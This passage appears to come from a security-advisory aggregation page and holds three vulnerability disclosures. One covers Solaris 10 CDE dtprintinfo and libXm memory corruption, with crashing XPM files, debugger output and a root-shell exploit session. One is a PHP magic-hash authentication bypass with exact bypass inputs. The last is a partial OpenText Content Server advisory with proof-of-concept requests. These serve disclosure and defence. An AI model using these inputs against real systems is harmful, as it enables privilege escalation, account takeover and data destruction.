4f4f 413b 4141 4141<br />0000020 4141 4141 4141 4141 4141 4141 4141 4141<br />*<br />0001000 4141 4141 4141 4141 4141 3b41 0a2c 4141<br />0001020 4141 4141 4141 4141 4141 4141 4141 4141<br />*<br />0001400 4141 4141 4141 4141 4141 4141 4141 e948<br />0001420 0810 6938 0810 0409 410a 4141 4141 4141<br /> ^^^^^^^^^ << 0x08106938<br />0001440 4141 4141 2c3b 000a<br />0001447<br /><br />By observing the output of truss, we can find the example leaked memory<br />address highlighted above:<br /><br />-> __0fJContainerLInnerWidgetv(0x8105ea8)<br /><- __0fJContainerLInnerWidgetv() = 0x8106938<br /> ^^^^^^^^^<br />-> libXm:_XmManagerGetValuesHook(0x8106938, 0xfe6a1820, 0x8047840)<br /> ^^^^^^^^^<br />...<br />-> __0fHIconObjNCreateIconObjP6HMotifUIPcNCCPFPv_vPvNDCP6NIconFieldsRec(0x8106d60, 0x8105ea8, 0x8086c3f, 0x0)<br /> -> __0fHMotifUIKGetPixmapsP6K_WidgetRecPcPUlTD(0x8106d60, 0x8106938, 0xfe62bd00, 0x8106dd0)<br /> ^^^^^^^^^<br /><br />By playing with different printer name lengths between 256 and 1024 bytes<br />and/or clicking on "Apply" or "OK" multiple times, we can leak different<br />heap memory contents. <br /><br />The "Set Default" button can be used to cause a similar .printers file<br />corruption. In addition, instead of injecting a single long printer name,<br />we can trigger the same bug by injecting a long list of regular printer<br />names and selecting them to be shown in dtprintinfo's GUI.<br /><br /><br />--[ 2.3 - Memory corruption via malformed icon files<br /><br />The ability to inject arbitrary printer names opens other attack vectors<br />that otherwise would not be available on systems without configured<br />printers. In fact, only privileged users can create or update printing<br />configuration in /etc/printers.conf, usually via /usr/sbin/printmgr or<br />/usr/bin/lpset.<br /><br />One such vector we thought that was worth exploring is the parsing of<br />printer icons in the XPM format [3]. A low-privileged local user can supply<br />his or her own icons for dtprintinfo to show by placing them in the<br />$HOME/.dt/icons directory and selecting them in the X11 GUI. A bug in the<br />XPM parser could easily lead to memory corruption and privilege escalation.<br />To prove our point, we built a rudimentary mutation fuzzer written in<br />Python and we unearthed a few icon parsing bugs in the libXm library<br />(/usr/dt/lib/libXm.so.4) used by CDE, that was originally part of the Motif<br />toolkit [4].<br /><br />As a starter, the following malformed icon file with an unbalanced comment<br />block will crash dtprintinfo:<br /><br />/* XPM */<br />static char * sample_xpm[] = {<br />"15 19 6 1",<br />" c None",<br />". c #FFFFFF",<br />"+ c #000000",<br />"@ c #99FFCC",<br />"# c #66CCCC",<br />"$ c #339966",<br />/* CRASH<br />".+++++++++++++.",<br />"+@@@@@@@@@@@@#+",<br />"+@###########$+",<br />"+@###....####$+",<br />"+@##......###$+",<br />"+@#...$$...##$+",<br />"+@#..$$##..$#$+",<br />"+@##$$##...$#$+",<br />"+@#####...$$#$+",<br />"+@####...$$##$+",<br />"+@####..$$###$+",<br />"+@####..$####$+",<br />"+@#####$$####$+",<br />"+@####..#####$+",<br />"+@####..$####$+",<br />"+@#####$$####$+",<br />"+@###########$+",<br />"+#$$$$$$$$$$$$+",<br />".+++++++++++++."};<br /><br />To reproduce the crash, inject an arbitrary printer as described earlier<br />and perform the following actions:<br /><br />* Craft the malformed XPM icon above in the following files in ~/.dt/icons:<br /> crash.l.pm<br /> crash.m.pm<br /> crash.t.pm<br />* Launch dtprintinfo with proper command-line options (e.g., -all).<br />* Select the injected printer, and click on "Selected" > "Properties...".<br />* Click on "Find Set..." and choose "~/.dt/icons" from the drop-down menu.<br /><br />After a short while, dtprintinfo should segfault:<br /><br />Program terminated with signal 11, Segmentation fault.<br />#0 0xfed322c8 in ParseComment () from /usr/dt/lib/libXm.so.4<br />(gdb) x/i $pc<br />0xfed322c8 <ParseComment+186>: mov (%edi),%ah<br />(gdb) i r<br />eax 0x8045bff 134503423<br />ecx 0x80456f0 134502128<br />edx 0xfe972be0 -23647264<br />ebx 0xfee90000 -18284544<br />esp 0x8024fbc 0x8024fbc<br />ebp 0x8024fdc 0x8024fdc<br />esi 0x7 7<br />edi 0xfeffffff -16777217<br />eip 0xfed322c8 0xfed322c8 <ParseComment+186><br />...<br />(gdb) bt<br />#0 0xfed322c8 in ParseComment () from /usr/dt/lib/libXm.so.4<br />#1 0xfed321dc in _XmxpmNextString () from /usr/dt/lib/libXm.so.4<br />#2 0xfed3392a in ParsePixels () from /usr/dt/lib/libXm.so.4<br />#3 0xfed32511 in _XmxpmParseData () from /usr/dt/lib/libXm.so.4<br />#4 0xfed31e24 in _XmXpmReadFileToImage () from /usr/dt/lib/libXm.so.4<br />#5 0xfef09ac1 in _DtXpmReadFileToImage () from /usr/dt/lib/libDtSvc.so.1<br />#6 0xfef09b2b in _DtXpmReadFileToPixmap () from /usr/dt/lib/libDtSvc.so.1<br />#7 0x08079969 in __0fHMotifUIKGetPixmapsP6K_WidgetRecPcPUlTD ()<br />#8 0x0807d872 in __0fHIconObjNCreateIconObjP6HMotifUIPcNCCPFPv_vPvNDCP6NIconFieldsRec ()<br />#9 0x0807d4b2 in __0oHIconObjctP6HMotifUIPcNECP6NIconFieldsRec ()<br />#10 0x08072c21 in __0fJDtFindSetKComboBoxCBP6LComboBoxObjPciT ()<br />#11 0x08075286 in __0fLComboBoxObjISelectCBP6K_WidgetRecPvTCT ()<br />...<br /><br />At a glance, this does not look exploitable. A much better-looking crash<br />can be triggered with the following malformed icon file:<br /><br />00000000: 2f2a 2058 504d 202a 2f0a 7374 6174 6963 /* XPM */.static<br />00000010: 2063 6861 7220 2a78 6d61 6e5b 5d20 3d20 char *xman[] =<br />00000020: 7b0a 2f2a 2077 6964 7468 2068 6569 6768 {./* width heigh<br />00000030: 7420 6e63 6f6c 6f72 7320 6368 6172 735f t ncolors chars_<br />00000040: 7065 725f 7069 7865 6c20 2a2f 0a22 3820 per_pixel */."8<br />00000050: 3820 3320 3122 2c0a 2f2a 2063 6f6c 6f72 8 3 1",./* color<br />00000060: 7320 2a2f 0a22 6520 6734 2062 6c61 636b s */."e g4 black<br />00000070: 2063 2070 616c 6520 7475 7271 756f 6973 c pale turquois<br />00000080: 6520 3422 2c0a 22fe 206d 2077 6869 7465 e 4",.". m white<br /> ^^ << this 0xfe byte triggers the crash<br />00000090: 2063 206c 6967 6874 2067 6f6c 6465 6e20 c light golden<br />000000a0: 726f 6420 7965 6c6c 6f77 2067 3420 6772 rod yellow g4 gr<br />000000b0: 6579 222c 0a22 6720 6720 7768 6974 6520 ey",."g g white<br />000000c0: 6320 6c65 6d6f 6e20 6368 6966 666f 6e20 c lemon chiffon<br />000000d0: 6d20 626c 6163 6b22 2c0a 2f2a 2070 6978 m black",./* pix<br />000000e0: 656c 7320 2a2f 0a22 6565 6565 6565 6565 els */."eeeeeeee<br />000000f0: 222c 0a22 6666 6666 6666 6666 222c 0a22 ",."ffffffff",."<br />00000100: 6767 6767 6767 6767 222c 0a22 6767 6767 gggggggg",."gggg<br />00000110: 6767 6767 220a 7d3b 0a gggg".};.<br /><br />Program terminated with signal 11, Segmentation fault.<br />#0 0x027efed3 in ?? ()<br />(gdb) i r<br />eax 0xfe634c80 -27046784<br />ecx 0x3 3<br />edx 0x0 0<br />ebx 0xfee90002 -18284542<br />esp 0x8045668 0x8045668<br />ebp 0x80456d0 0x80456d0<br />esi 0x80460d0 134504656<br />edi 0x80456f0 134502128<br />eip 0x27efed3 0x27efed3<br />...<br />#0 0x027efed3 in ?? ()<br />#1 0xfed3266a in _XmxpmParseData () from /usr/dt/lib/libXm.so.4<br />#2 0xfed31e24 in _XmXpmReadFileToImage () from /usr/dt/lib/libXm.so.4<br />#3 0xfef09ac1 in _DtXpmReadFileToImage () from /usr/dt/lib/libDtSvc.so.1<br />#4 0xfef09b2b in _DtXpmReadFileToPixmap () from /usr/dt/lib/libDtSvc.so.1<br />#5 0x08079969 in __0fHMotifUIKGetPixmapsP6K_WidgetRecPcPUlTD ()<br />#6 0x0807d872 in __0fHIconObjNCreateIconObjP6HMotifUIPcNCCPFPv_vPvNDCP6NIconFieldsRec ()<br />#7 0x0807d4b2 in __0oHIconObjctP6HMotifUIPcNECP6NIconFieldsRec ()<br />#8 0x08072c21 in __0fJDtFindSetKComboBoxCBP6LComboBoxObjPciT ()<br />#9 0x08075286 in __0fLComboBoxObjISelectCBP6K_WidgetRecPvTCT ()<br /><br />It looks like we have at least partial control over the eip register! A<br />promising crash indeed... An interesting variation that can help shed light<br />on the reasons of this crash can be obtained by replacing the 0xfe byte<br />with 0xff:<br /><br />Program terminated with signal 11, Segmentation fault.<br />#0 0xfed20268 in _XmxpmFreeColorTable@plt () from /usr/dt/lib/libXm.so.4<br />(gdb) x/i $pc<br />0xfed20268 <_XmxpmFreeColorTable@plt>: jmp *0x19ec(%ebx)<br />(gdb) i r<br />eax 0xfe62d680 -27076992<br />ecx 0x3 3<br />edx 0x0 0<br />ebx 0x20000 131072<br />esp 0x8045668 0x8045668<br />ebp 0x80456d0 0x80456d0<br />esi 0x80460d0 134504656<br />edi 0x80456f0 134502128<br />eip 0xfed20268 0xfed20268 <_XmxpmFreeColorTable@plt><br />...<br />#0 0xfed20268 in _XmxpmFreeColorTable@plt () from /usr/dt/lib/libXm.so.4<br />#1 0xfed3266a in _XmxpmParseData () from /usr/dt/lib/libXm.so.4<br />#2 0xfed31e24 in _XmXpmReadFileToImage () from /usr/dt/lib/libXm.so.4<br />#3 0xfeef9ac1 in _DtXpmReadFileToImage () from /usr/dt/lib/libDtSvc.so.1<br />#4 0xfeef9b2b in _DtXpmReadFileToPixmap () from /usr/dt/lib/libDtSvc.so.1<br />#5 0x08079969 in __0fHMotifUIKGetPixmapsP6K_WidgetRecPcPUlTD ()<br />#6 0x0807d872 in __0fHIconObjNCreateIconObjP6HMotifUIPcNCCPFPv_vPvNDCP6NIconFieldsRec ()<br />#7 0x0807d4b2 in __0oHIconObjctP6HMotifUIPcNECP6NIconFieldsRec ()<br />#8 0x08072c21 in __0fJDtFindSetKComboBoxCBP6LComboBoxObjPciT ()<br />#9 0x08075286 in __0fLComboBoxObjISelectCBP6K_WidgetRecPvTCT ()<br /><br />Based on our quick analysis, ebx gets corrupted in ParsePixels() and then<br />its value is used to calculate a jump location by code in the .plt section.<br />We have not deeply investigated these instances of memory corruption and we<br />have not seriously fuzzed libXm's XPM parser. We would like to leave<br />further exploration of this attack vector, as well as any vulnerabilities<br />in other libraries used by dtprintinfo, as an exercise for you, dear<br />readers. ;)<br /><br /><br />--[ 2.4 - Stack-based buffer overflow in libXm ParseColors()<br /><br />After our brief but intense artisanal fuzzing experience, before giving up<br />on dtprintinfo and going for some fancier target, it was time to go back to<br />static analysis for a short while, specifically targeting the apparently<br />weak libXm library.<br /><br />We fired up our Rhabdomancer Ghidra script [5] to quickly find locations in<br />the library where unsafe API functions are called, using them as starting<br />points for our binary audit. Among some interesting candidate points, the<br />following one stood up, in the familiar ParseColors() function that we had<br />already encountered while analyzing the crashes produced by our XPM fuzzer:<br /><br />int ParseColors(int *data, uint ncolors, uint cpp, undefined4<br /> *colorTablePtr, undefined4 hashtable)<br />{<br /> ...<br /> char local_83c[1024];<br /> char local_43c[1024];<br /> ...<br /> local_c = _XmxpmNextWord(local_34, local_83c, 0x400);<br /> ...<br /> local_83c[local_c] = '\0';<br /> strcat(local_43c, local_83c); /* VULN */<br />}<br /><br />A perfect specimen of stack-based buffer overflow! We have found yet<br />another memory corruption bug in the parsing of printer icons in the XPM<br />format. This one has a high likelihood of being exploitable to achieve<br />arbitrary code execution and local privilege escalation.<br /><br /><br />--[ 3 - Analysis<br /><br />Let's briefly analyze what causes the identified vulnerabilities.<br /><br /><br />--[ 3.1 - Printer name injection and heap memory disclosure<br /><br />The arbitrary printer name injection and heap memory disclosure bugs have<br />the following root causes:<br /><br />* The /usr/bin/lpstat external command invoked by dtprintinfo to list the<br /> names of available printers has a flawed parser, which allows<br /> low-privileged local users to inject arbitrary printer names in the<br /> user-controllable $HOME/.printers file:<br /><br /> bash-3.2$ cat ~/.printers<br /> FOO;AAA; :<br /> bash-3.2$ lpstat -v<br /> system for FOO;AAA;: (null) (as lpd://(null)/printers/)<br /><br /> From our point of view, this in itself is not a big deal. Since lpstat is<br /> executed after dropping privileges, we could in theory inject our own<br /> code into this process anyway and control its behavior. For this reason,<br /> we have not investigated lpstat any further. The real problem here is<br /> architectural: dtprintinfo's functionality should be self-contained and<br /> should not depend on external programs. This is not a robust design and<br /> has led to more impactful vulnerabilities in the past [6].<br /><br />* The dtprintinfo program blindly trusts the output of lpstat without<br /> validating it. This allows low-privileged local users to craft<br /> potentially dangerous inputs (such as printer names that are expected to<br /> be in a consistent format), thus altering its behavior.<br /><br />* Finally, the DtConfigPrinters::UpdateMainPrtList() method called by the<br /> DtConfigPrinters::ApplyCB() and DtConfigPrinters::OkCB() callback<br /> methods, when updating the .printers file, writes some additional bytes<br /> after the actual printer names, thus corrupting the file contents. This<br /> is caused by the fact that the DtConfigPrinters::readContinuedLine()<br /> method called by DtConfigPrinters::UpdateMainPrtList() does not terminate<br /> the returned buffer if it reads a line longer than 256 bytes that does<br /> not contain a '\n' character. This non-terminated, heap-allocated buffer<br /> is later passed to fprintf(), which then writes some characters that<br /> reside past the logical end of the buffer to the .printers file, until a<br /> NUL byte is found. This is how we get the observed memory disclosure.<br /><br />Based on our analysis, the described memory disclosure bug does not seem to<br />be directly exploitable to achieve arbitrary code execution and local<br />privilege escalation. However, as usual, feel free to prove us wrong! All<br />considered, we recommend treating this bug as a potential security<br />vulnerability and fixing it as such.<br /><br /><br />--[ 3.2 - Memory corruption via malformed icon files<br /><br />The stack-based buffer overflow in the ParseColors() function of libXm is<br />caused by the unchecked use of the unsafe API function strcat(). This<br />vulnerability can be triggered via a specially crafted XPM icon with long<br />color strings.<br /><br />We have not spent much time analyzing the root causes of the crashes<br />reported by our XPM fuzzer. We recommend extensively auditing and fuzzing<br />libXm and the other libraries distributed with CDE that are used by<br />privileged programs. A quick manual audit and a few runs of our rudimentary<br />mutation fuzzer were enough to discover some shallow and dangerous memory<br />corruption bugs in the XPM parser. We expect more bugs to be present in<br />such ancient code.<br /><br /><br />--[ 4 - Exploitation<br /><br />We have created a proof-of-concept exploit [7] that chains together the<br />printer name injection bug and the stack-based buffer overflow we have<br />identified in libXm. It allows a low-privileged local user to escalate his<br />or her privileges to those of the root user on Intel-based Solaris 10<br />systems with the latest patches installed (tested on CPU January 2021).<br /><br />The exploit code is extensively commented and should be self-explanatory.<br />An example attack session follows:<br /><br />$ uname -a<br />SunOS nostalgia 5.10 Generic_153154-01 i86pc i386 i86pc<br />$ id<br />uid=54322(raptor) gid=1(other)<br />$ gcc raptor_dtprintlibXmas.c -o raptor_dtprintlibXmas -Wall<br />$ ./raptor_dtprintlibXmas 10.0.0.109:0<br />raptor_dtprintlibXmas.c - Solaris 10 CDE #ForeverDay LPE<br />Copyright (c) 2023 Marco Ivaldi <raptor@0xdeadbeef.info><br /><br />Using SI_PLATFORM : i86pc (5.10)<br />Using stack base : 0x8047fff<br />Using safe address : 0x8045790<br />Using rwx_mem address : 0xfeffa004<br />Using sc address : 0x8047fac<br />Using sprintf() address : 0xfefd1250<br />Path of target binary : /usr/dt/bin/dtprintinfo<br /><br /># id<br />uid=0(root) gid=1(other)<br /><br />Our exploit uses dtprintinfo as an attack vector to abuse one of the<br />vulnerabilities we discovered in libXm and escalate privileges to root.<br />Other vectors are potentially available to local and remote attackers, such<br />as other setuid or setgid binaries, daemons, and client applications that<br />use of the vulnerable library. As an example, the dticon application has<br />been confirmed to be affected by our stack-based buffer overflow.<br /><br /><br />--[ 5 - Affected products<br /><br />The Common Desktop Environment 1.6 and Motif 2.1 distributed with Oracle<br />Solaris 10 are affected by the vulnerabilities discussed in this advisory.<br />All tests were conducted on the following Solaris 10 system, patched with<br />CPU January 2021:<br /><br />bash-3.2$ showrev -a<br />Hostname: nostalgia<br />Hostid: 367f0939<br />Release: 5.10<br />Kernel architecture: i86pc<br />Application architecture: i386<br />Kernel version: SunOS 5.10 Generic_153154-01<br />OpenWindows version: Solaris X11 Version 6.6.2 14 August 2019<br />...<br /><br />Solaris 10 for the SPARC architecture and older versions of the Solaris<br />operating system are also likely vulnerable. <br /><br />Oracle Solaris 11.4 does not ship CDE or Motif by default. In addition, in<br />the xpmParseColors() function of the libXpm library shipped with Solaris<br />11.4, calls to the unsafe strcat() API function were replaced with calls to<br />strlcat(), which if used properly prevents buffer overflows. Solaris 11.4<br />in its default configuration and libXpm are only affected by the first<br />crash we identified, caused by an unbalanced comment block. Please note<br />that we have not conducted an audit on libXpm, which may contain other<br />bugs.<br /><br />CDE 2.5.1 [8] is the latest version (at the time of this writing) of the<br />open-source fork of the Common Desktop Environment. Following our previous<br />vulnerability disclosures, their dtprintinfo binary is not installed<br />setuid-root anymore. Therefore, CDE 2.5.1 is not directly affected by the<br />vulnerabilities discussed in this advisory. Please note that we have not<br />conducted an audit on the open-source CDE's codebase, which may contain<br />other bugs.<br /><br />Motif 2.3.8 [9] is the latest version (at the time of this writing) of the<br />open-source Motif project that includes the libXm library. In the<br />xpmParseColors() function, calls to the unsafe strcat() API function were<br />replaced with calls to the STRLCAT() macro, which if used properly prevents<br />buffer overflows. Therefore, Motif 2.3.8 is not affected by the<br />vulnerabilities discussed in this advisory. Please note that we have not<br />conducted an audit on Motif's codebase, which may contain other bugs.<br /><br /><br />--[ 6 - Remediation<br /><br />Oracle assigned the following tracking numbers to our vulnerability<br />reports:<br /><br />* S1597707 - Arbitrary printer name injection<br />* S1597724 - Heap memory disclosure via long printer names<br />* S1597711 - Memory corruption via malformed icon files<br />* S1597730 - Stack-based buffer overflow in libXm ParseColors<br /><br />No fixes have been issued for Solaris 10. See the disclosure timeline below<br />for further details.<br /><br />As a partial workaround, it is possible to remove the setuid bit from the<br />dtprintinfo binary as follows (note that this might prevent it from working<br />properly):<br /><br />bash-3.2# chmod -s /usr/dt/bin/dtprintinfo<br /><br /><br />--[ 7 - Disclosure timeline<br /><br />2022-01-18: Oracle was notified via <secalert_us@oracle.com>.<br />2022-01-19: Oracle acknowledged our vulnerability reports.<br />2022-04-20: Asked Oracle to provide an update on the patch release date.<br />2022-04-21: Oracle replied they could not comment on the patch release<br /> date. <br />2022-09-03: Asked Oracle for an update and informed them of our plan to<br /> publish a detailed advisory and a blog post before the end of<br /> 2022.<br />2022-09-12: Oracle replied they are working on the bugs and will be able to<br /> give an update closer to the next CPU, scheduled for October.<br />2022-10-18: Oracle informed us that the vulnerabilities will be fixed in<br /> their CPU of January 2023.<br />2022-12-20: With a surprise move, Oracle informed us that Solaris 10<br /> desktop components have reached EOL and are no longer<br /> supported. Therefore, Oracle will not be releasing patches for<br /> bugs affecting Solaris 10. They will work with X.Org to get a<br /> fix and an advisory released upstream for the first crash we<br /> identified in libXm, which also affects X.Org libXpm. This<br /> denial of service bug will be fixed in Solaris 11.4. As a final<br /> note, it appears that the buffer overflows we discovered in<br /> ParsePixels() and ParseColors() were already reported by Chris<br /> Evans in 2004 and tracked as CVE-2004-0687<br /> (https://security.appspot.com/security/CESA-2004-003.txt). Due<br /> to an incomplete fix, they were not patched in Solaris 10 and<br /> have survived in the code for 19 years! Since no patches for<br /> Solaris 10 will be released, these issues have officially<br /> become #ForeverDay bugs.<br />2023-01-17: X.Org released libXpm 3.5.15, which fixes CVE-2022-46285<br /> (infinite loop on unclosed comments in X.Org libXpm). Oracle<br /> published their CPU January 2023, which unfortunately does not<br /> include fixes for our bugs that affect Solaris 10.<br />2023-01-18: Oracle informed us that Solaris 10 desktop components have<br /> reached EOL at the end of 2019. EOL is documented in support<br /> note 1400676.1, behind the paywall for Oracle's customers with<br /> current support contracts. HN Security published this advisory<br /> and a local privilege escalation exploit.<br /><br /><br />--[ 8 - References<br /><br />[1] https://github.com/0xdea/raptor_infiltrate20<br />[2] https://www.exploit-db.com/search?q=dtprintinfo<br />[3] https://www.xfree86.org/current/xpm.pdf<br />[4] http://www.opengroup.org/desktop/motif.html<br />[5] https://github.com/0xdea/ghidra-scripts/blob/main/Rhabdomancer.java<br />[6] https://github.com/0xdea/raptor_infiltrate19<br />[7] https://github.com/0xdea/exploits/blob/master/solaris/raptor_dtprintlibXmas.c<br />[8] https://sourceforge.net/projects/cdesktopenv/<br />[9] https://sourceforge.net/projects/motif/<br /><br /><br />Copyright (c) 2023 Marco Ivaldi and Humanativa Group. All rights reserved.<br /></code></pre>
<pre><code># Exploit Title: Patient Record Management System v1.0 - Authentication Bypass via PHP Loose Comparison<br /># Exploit Author: Joe Pollock<br /># Date: January 19, 2023<br /># Vendor Homepage: https://www.sourcecodester.com/php/13505/patient-record-management-system.html<br /># Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/patientrecords.zip<br /># Tested on: Kali Linux, Apache, Mysql, PHP 8.1.5<br /># CVE: T.B.C<br /># Vendor: kimcey500<br /># Version: 1.0<br /># Exploit Description:<br /># Patient Record Management System v1.0 implements a PHP loose comparison within the password recovery functionality (secret question/answer) of <br /># the admin account, which renders the application vulnerable to an authentication bypass depending on the secret answer chosen by the administrator. <br /># If the secret answer generates a SHA1 magic hash (SHA1 is the hashing format used by the application to store secret answers) then an authentication <br /># bypass of the admin account is possible using any other SHA1 magic hash. The vulnerable function is found within User_model.php and is shown below:<br /><br />public function get_forgot_secret($login_id, $secans){<br /> $this->db->where('u_id', $login_id);<br /> $query = $this->db->get('users');<br /> $decrypt = $query->row()->u_secretanswer;<br /> if(sha1($secans) == $decrypt){ // md5 encryption <br /> return $query->row();<br /> }<br />} <br /><br />========================================================<br />(+) To reproduce this exploit:<br />========================================================<br />1. Log in as the administrator and navigate to the password recovery functionality (http://localhost/Indexcontrol/secretquestion).<br />2. Enter the ‘Current Password’ then select any ‘Secret Question’. <br />3. For the ‘Secret Answer’, use the following: 10932435112<br />4. Confirm the ‘Secret Answer’ then click ‘Submit’. Now logout of the administrator account.<br />5. From the admin login page, click ‘Forgot Password?’.<br />6. Enter ‘admin’ as the username then click ‘Submit’.<br />7. For the ‘Secret Answer’, use any of the following:<br /><br />aaroZmOk<br />w9KASOk6Ikap<br />aaO8zKZF<br />aa3OFF9m<br />w9KASOk6Ikap<br /><br />8. After clicking 'Submit, the 'create new password' functionality should be displayed and therefore authentication can be bypassed.<br /><br />========================================================<br />(+) Explanation:<br />========================================================<br />Following from above, assume the administrator has chosen the following as their secret answer: <br /><br />10932435112<br /><br />The application then stores the SHA1 hash of the secret answer in the database. The stored hash is: <br /><br />0e07766915004133176347055865026311692244<br /><br />The above hash is an example of a 'magic hash', i.e. the hash starts with "0e" (or "0..0e") only followed by numbers.<br /><br />In PHP, if two strings are loosely compared (==) and match the regular expression 0+e[0-9]+, the result will be TRUE.<br /><br />It will then be possible to bypass the authentication of this account using any secret answer which generates a SHA1 magic hash. <br /><br />Any of the following secret answers could be used to bypass authentication:<br /><br />aaroZmOk<br />w9KASOk6Ikap<br />aaO8zKZF<br />aa3OFF9m<br />w9KASOk6Ikap<br /><br />See here for more examples that could be used: https://github.com/spaze/hashes/blob/master/sha1.md<br /><br />The comparision which would take place by the application in get_forgot_secret() is:<br /><br />if(sha1(aaroZmOk) == "0e07766915004133176347055865026311692244"){ <br /> //Reset password<br /><br />Which becomes:<br /><br />if("0e66507019969427134894567494305185566735" == "0e07766915004133176347055865026311692244"){ <br /> //Reset password<br /><br />Due to the loose comparision used (==), the above evaluates to TRUE, which would then allow the attacker to change<br />the password of the account.<br /><br />You can try this yourself using the interactive PHP interpreter:<br /><br />var_dump(sha1('aaroZmOk') == "0e111");<br />var_dump(sha1('aaroZmOk') == "0e222");<br />var_dump(sha1('aaroZmOk') == sha1('w9KASOk6Ikap'));<br /><br />========================================================<br />(+) References and more information<br />========================================================<br />https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Type%20Juggling/README.md<br />http://turbochaos.blogspot.com/2013/08/exploiting-exotic-bugs-php-type-juggling.html<br />https://www.whitehatsec.com/blog/magic-hashes/<br />https://github.com/spaze/hashes<br />https://offsec.almond.consulting/super-magic-hash.html<br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /></code></pre>
<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20230117-2 ><br />=======================================================================<br /> title: Multiple post-authentication vulnerabilities including RCE<br /> product: OpenText™ Content Server component of OpenText™ Extended ECM<br /> vulnerable version: 16.2.2 - 22.3<br /> fixed version: 22.4<br /> CVE number: CVE-2022-45924, CVE-2022-45922, CVE-2022-45925,<br /> CVE-2022-45926, CVE-2022-45928<br /> impact: High<br /> homepage: https://www.opentext.com/<br /> found: 2022-09-16<br /> by: Armin Stock (Atos)<br /> SEC Consult Vulnerability Lab<br /><br /> An integrated part of SEC Consult, an Atos company<br /> Europe | Asia | North America<br /><br /> https://www.sec-consult.com<br /><br />=======================================================================<br /><br />Vendor description:<br />-------------------<br />"OpenText™ Extended ECM is an enterprise CMS platform that securely governs the<br />information lifecycle by integrating with leading enterprise applications, such<br />as SAP®, Microsoft® 365, Salesforce and SAP SuccessFactors®. Bringing content<br />and processes together, Extended ECM provides access to information when and<br />where it’s needed, improves decision-making and drives operational effectiveness."<br /><br />Source: https://www.opentext.com/products/extended-ecm<br /><br /><br />Business recommendation:<br />------------------------<br />The vendor provides a patch which should be installed immediately.<br /><br /><br />Vulnerability overview/description:<br />-----------------------------------<br />1) Deletion of arbitrary files (CVE-2022-45924)<br />The endpoint `itemtemplate.createtemplate2` allows a low privilege user to<br />delete arbitrary files on the server's local filesystem.<br /><br />2) Privilege escalation due to logic error in cookie creation (CVE-2022-45922)<br />The request handler for a user accessible function sets a valid AdminPwd cookie<br />that allows access to unauthorized endpoints without knowing the password.<br /><br />3) xmlExport multiple vulnerabilities (CVE-2022-45925)<br />3.1) Information disclosure<br />The action `xmlexport` accepts the parameter `requestContext`. If this<br />parameter is present, the response does include most of the `HTTP` headers sent<br />to the server and some of the `CGI` variables like `remote_addr` and<br />`server_name`.<br /><br />3.2) Capture of NTLM hashes<br />The action `xmlexport` accepts the parameter `transform` in combination<br />with `stylesheet`. The `stylesheet` parameter can be a `nodeID` or a filepath.<br />If a filepath is specified, the `ContentServer` tries to open the file. As<br />absolute paths are allowed it is possible to provide a network share to force<br />the `ContentServer` to open a connection to the network share. This allows an<br />attacker to capture the `NTLM Hash` of the user running the `ContentServer`.<br /><br />4) Evaluate webreports via notify.localizeEmailTemplate (CVE-2022-45926)<br />The endpoint `notify.localizeEmailTemplate` does allow a low privilege user to<br />evaluate webreports. This can be used to perform a `Server Side Request Forgery<br />(SSRF)` attack, with nearly full control of the actual request.<br /><br />5) Local File Inclusion allows Oscript execution (CVE-2022-45928)<br />Multiple endpoints allow the user to pass the parameter `htmlFile`, which is<br />included in the `HTML` output rendering pipeline of the request. As the<br />`Content Server` evaluates and executes `Oscript` code in `HTML` files, it is<br />possible for an attacker to execute `Oscript` code. The `Oscript` scripting<br />language allows the attacker for example to manipulate files on the filesystem,<br />create new network connections or execute OS system commands.<br /><br /><br />Proof of concept:<br />-----------------<br />1) Deletion of arbitrary files (CVE-2022-45924)<br />As a first step the user has to create a new `Customer View Template` object via<br />`/cs.exe?func=ll&objAction=create&objtype=844&nextURL=foo` to get a valid<br />`cacheID`. With the acquired `cacheID` the following request can be used to<br />delete a file. The parameter `DefinitionFile` controls which file should be<br />deleted.<br /><br />-------------------------------------------------------------------------------<br />http://opentext-dev/OTCS/cs.exe?func=itemtemplate.createtemplate2&objType=844&parentId=2000&cacheID=730440157&DefinitionFile=C:/temp/poc-del.txt<br />-------------------------------------------------------------------------------<br /><br /><br />2) Privilege escalation due to logic error in cookie creation (CVE-2022-45922)<br />Sending the following request returns a new valid `AdminPwd` cookie.<br /><br />-------------------------------------------------------------------------------<br />[ PoC removed, will be published at a later date ]<br />-------------------------------------------------------------------------------<br /><br />Response:<br />-------------------------------------------------------------------------------<br />HTTP/1.1 200 OK<br />Cache-Control: no-cache<br />Pragma: no-cache<br />Content-Type: application/json; charset=UTF-8<br />Server: Microsoft-IIS/10.0<br />Set-Cookie: <br />LLCookie=7X%2BfmttVXssmR2fGiuA4%2BeDFI4%2FotYL4o%2BkpxBTZUWrlHqwvH%2BIg3BCPhuBhD%2B567K288n7PJNeZQkk75EmxtndEpU3chq3cFppnAQ7OAYMX%2Bvl09QntFKi9E%2BWekSdNU866093uXCT4IqYR1ofVfkoLKFwTiUf%2BhgrVKaB8aoLOLlBU5RIrNA%3D%3D; <br />path=/OTCS/; httponly<br />Set-Cookie: <br />AdminPwd=oq6SNA9Db6yUl0vP1ucJkLuRhIYbvO3YdIujUbLLdzGMsygouzJlyuhDLTriq4C1XrMHxWYWkCeuxoZevX0%2BYyFMEevzZVXI6Fe82YBI3HnKu2Stq50vZ8bhPPQeBbXiW%2FRwgp8RHukHgnEWUq3axpUP5OHWCJj9V3Pj5%2FNNqJKie0gUv055KavSIj80Id4dXDiHVu%2FI6IXMhEb1Tm4EVLE1rjxMnpmZILTKds%2FkabH%2FanPx5Jl3YL%2BBkX0PiPe54guaWQj2ReTr1SW7Beomoriq2FrW%2BWK91OtMy%2BbrVTfgEZSRdRNIkA%3D%3D; <br />path=/OTCS/; httponly<br />X-Powered-By: ASP.NET<br />Date: Sat, 01 Oct 2022 17:57:54 GMT<br />Connection: close<br />Content-Length: 221<br /><br />{"errMsg":"","ok":true,"sessionInactivity":1620000,"sessionLogoutURL":"?func=ll.DoLogout&secureRequestToken=STWVlmadtchZfgpCevUaWz%2FG%2BaDWVMAmJIByhcw6J3FRBkfQdUEyakxuWBKKZIfkujPUOp2jURQ%3D","sessionReactionTime":180000}<br />-------------------------------------------------------------------------------<br /><br /><br />3) 